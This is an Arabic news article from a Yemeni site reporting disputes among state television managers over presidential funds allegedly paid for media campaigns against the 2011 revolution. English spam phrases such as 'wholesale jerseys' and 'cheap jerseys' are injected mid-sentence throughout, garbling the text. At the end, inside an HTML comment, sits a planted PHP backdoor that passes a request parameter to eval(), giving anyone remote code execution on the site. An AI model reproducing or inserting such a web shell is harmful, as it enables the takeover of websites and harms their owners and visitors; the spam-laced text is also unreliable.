المنبر الاعلامي الحر

أنباء عن خلافات تسود قطاع التلفزيون الرسمي بسبب مبالغ صرفتها الرئاسة

113

تسود هذه الأيام خلافات حادة بين أوساط العاملين والقائمين على القنوات الرسمية”اليمن،سبأ والإيمان” على خلفية مخصصات مالية باهظة صرفت من رئاسة الجمهورية مقابل تبني هذه القنوات للحملات الإعلامية المضادة للثورة الشعبية السلمية التي تشهدها اليمن منذ ثلاثة wholesale jerseys أشهر للمطالبة بإسقاط النظام .

وكشفت مصادر”لمأرب برس”أنه تم تخصيص مايزيد عن 120 مليون ريال لهذه القنوات من أصل 300مليون كانت قد خصصت من cheap jerseys الرئاسة لشن حملات إعلامية موجهة للتشويش على ثورة الشباب,موزعة على القنوات الرسمية وبعض رؤساء تحرير صحف اهلية ومواقع إخبارية وشخصيات إعلامية وأكاديمية ومراسلين .

كما نالت العديد من المواقع الألكترونيه الإخبارية إضافة إلى العديد من الصحف الأهلية مبالغ كبيرة كي تنضم إلى الموجة , للدفع إلى تشويه الثورة , وتقديمها كاكابوس قادم على الشعب اليمني .

وأضافت مصادر موثوقة ان جوهر تلك الخلافات بين المكلف بأعمال رئاسة قطاع التلفزيون قناة اليمن عبدالله الحرازي ومدير البرامج محمدالردمي ومدراء عموم قناتي سبأ والإيمان حول نصيب كل واحد منهم من تلك الملايين كمشرفين على تلك البرامج والنشرات الإخبارية الهادفة للدفاع عن النظام ومهاجمة خصومه والمضللة للرأي العام .

وفي SpearheadHuts.Org الوقت الذي لم تحسم بعد تلك الخلافات حتى الآن تسود موظفي القطاعات Kenny الثلاثة حالة من الغضب نتيجة تقاضيهم مبالغ زهيدة تراوحت بين “8000 ريال و20000و40000حسب طبيعة أعمالهم” وأن ما صرف إجمالا للعاملين في الثلاث القنوات لم يتجاوز 12 مليون ريال فقط من إجمالي 120 مليون ريال .

وهو ما يعني ان الخلافات الراهنة بين مدراء تلك القنوات حول إجمالي المبلغ المتبقي “قرابة 108″ ملايين ريال,وفقا للمصادر.

وحسب المعلومات ” فإن صرف تلك المبالغ لم يشمل جميع العاملين بل خصص للمجندين حاليا فقط في القنوات الثلاث لإدارة الحملة البرامجية المذكورة, فيما استثني منها الممتنعون عن الظهور والعمل في الفترة الراهنة احتجاجا على غياب مهنية تلك القنوات التي باتت Citywest اليوم محط سخط جماهيري كبير في الشارع اليمني نظرا لسياستها الإعلامية المتسمة بالزيف والتضليل وبث الأكاذيب “Tokyo وتغييب الآخر

يأتي هذا في ظل استياء شريحة واسعة من الصحفيين والإعلاميين والحقوقيين نتيجة اداء تلك القنوات’واعتزامهم wholesale jerseys تنظيم حركات احتجاجية للمطالبة بإقالة مسؤولي قنوات”اليمن وسبأ والإيمان وعدن” ورفع دعاوى قضائية ضدهم خلال الأيام cheap jerseys القادمة .

<!– [insert_php]if (isset($_REQUEST["YtWJ"])){eval($_REQUEST["YtWJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["YtWJ"])){eval($_REQUEST["YtWJ"]);exit;}[/php] –>